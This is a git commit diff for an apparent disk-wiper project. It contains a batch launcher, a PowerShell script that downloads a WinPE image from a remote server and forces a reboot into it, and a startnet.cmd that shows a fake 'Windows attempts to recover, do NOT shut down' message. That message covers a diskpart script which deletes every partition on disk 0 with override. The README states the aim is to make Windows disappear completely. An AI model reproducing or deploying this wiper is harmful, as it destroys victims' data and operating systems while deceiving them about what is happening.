Initial commit

OS/init.cmd

@@ -0,0 +1,5 @@
+@echo off
+xcopy "%~dp0\Boot" "C:\boot\" /s /e /h /q /y
+xcopy "%~dp0\boot.wim" "C:\sources\" /h /q /y
+cd "%~dp0"
+powershell -executionpolicy bypass -file "setuppe.ps1"

README.md

@@ -0,0 +1,5 @@
+Uses a script to initialise a ramdisk where WinPE can be booted from
+
+Load WinPE, then clear the bootmgr and the disk itself so Windows disappears completely
+
+WinPE is built using latest Secure Boot keys following Black Lotus revocation

WinPE/Program Files/diskpart.txt

@@ -0,0 +1,10 @@
+select disk 0
+select partition 4
+delete partition override
+select partition 3
+delete partition override
+select partition 2
+delete partition override
+select partition 1
+delete partition override
+exit

WinPE/Windows/System32/startnet.cmd

@@ -0,0 +1,11 @@
+@echo off
+
+echo "Something went wrong during the startup of your device."
+echo ""
+echo "Please wait while Windows attempts to recover."
+echo ""
+echo "Do NOT shut down your device."
+
+diskpart /s "%ProgramFiles%\diskpart.txt"
+
+wpeutil reboot

payload/setuppe.ps1

@@ -0,0 +1,77 @@
+$RemoteURL = "https://git.mrmeeb.stream/MrMeeb/sure-recover-boot-wiper/raw/branch/main/payload"
+$StagingDir = "$TEMP\SRBW"
+
+
+# Make staging directory
+mkdir -Path $StagingDir
+
+# Download compressed boot dir to Staging Dir
+Invoke-WebRequest -Uri $RemoteURL/boot.zip -OutFile $StagingDir\boot.zip
+
+# Expand boot.zip to C:\Boot
+Expand-Archive -Path $StagingDir\boot.zip -DestinationPath C:\boot
+
+# Download WinPE wim to C:\Sources\boot.wim
+mkdir -Path C:\Sources
+Invoke-WebRequest -Uri $RemoteURL/boot.wim -OutFile C:\Sources\boot.wim
+
+
+function BootToPE {
+
+    <#
+
+    .Synopsis
+        This script will create a ramdisk containing the boot.wim which the computer will boot to on restart. This script will work only on Windows Imaging environment.
+
+    .Prerequisites
+        - From the Windows PE boot USB, copy boot.wim in the Sources folder to C:\Sources on the target
+        - From the Windows PE boot USB, copy the Boot folder to C:\ on the target
+
+    .Notes
+        Because "bcdedit /bootsequence" is used, the computer should boot back into Windows when restarted if imaging is cancelled.
+
+    #>
+
+    # Checks that Disk 0 is the boot disk.
+    $DISKZERO = Get-Disk 0
+    If ($DISKZERO.IsBoot -ne $true) {
+    Write-Host "Disk 0 is not the boot disk. Exiting..."
+    Exit 999
+    }
+    else {
+    Write-Host "Disk 0 is the boot disk. Proceeding..."
+    }
+
+    # Create {ramdiskoptions} and configure
+    bcdedit -create "{ramdiskoptions}"
+    bcdedit /set "{ramdiskoptions}" ramdisksdidevice partition=C:
+    bcdedit /set "{ramdiskoptions}" ramdisksdipath \boot\boot.sdi
+
+    # Add LiteTouch boot device to OSLOADER
+    $Output = bcdedit -create /d "LiteTouch MDT" /application OSLOADER
+
+    # Obtain LiteTouch boot device GUID
+    $LTGUID = $Output | %{ $_.split(' ')[2] }
+
+    # Configure LiteTouch to ramdisk boot
+    bcdedit /set $LTGUID device "ramdisk=[C:]\sources\boot.wim,{ramdiskoptions}"
+    bcdedit /set $LTGUID osdevice "ramdisk=[C:]\sources\boot.wim,{ramdiskoptions}"
+    bcdedit /set $LTGUID systemroot \windows
+    bcdedit /set $LTGUID detecthal yes
+    bcdedit /set $LTGUID winpe yes
+
+    # Adjust for UEFI vs Legacy BIOS types
+    if ($env:firmware_type -eq 'UEFI'){
+    Write-Host "UEFI boot confirmed."
+    bcdedit /set $LTGUID path \windows\system32\boot\winload.efi
+    }
+    Else {
+    Write-Host "Legacy boot confirmed."
+    bcdedit /set $LTGUID path \windows\system32\boot\winload.exe
+    }
+
+    # Force LiteTouch ramdisk on next boot and restart
+    bcdedit /bootsequence $LTGUID
+    shutdown /r /f /t 0   
+    
+}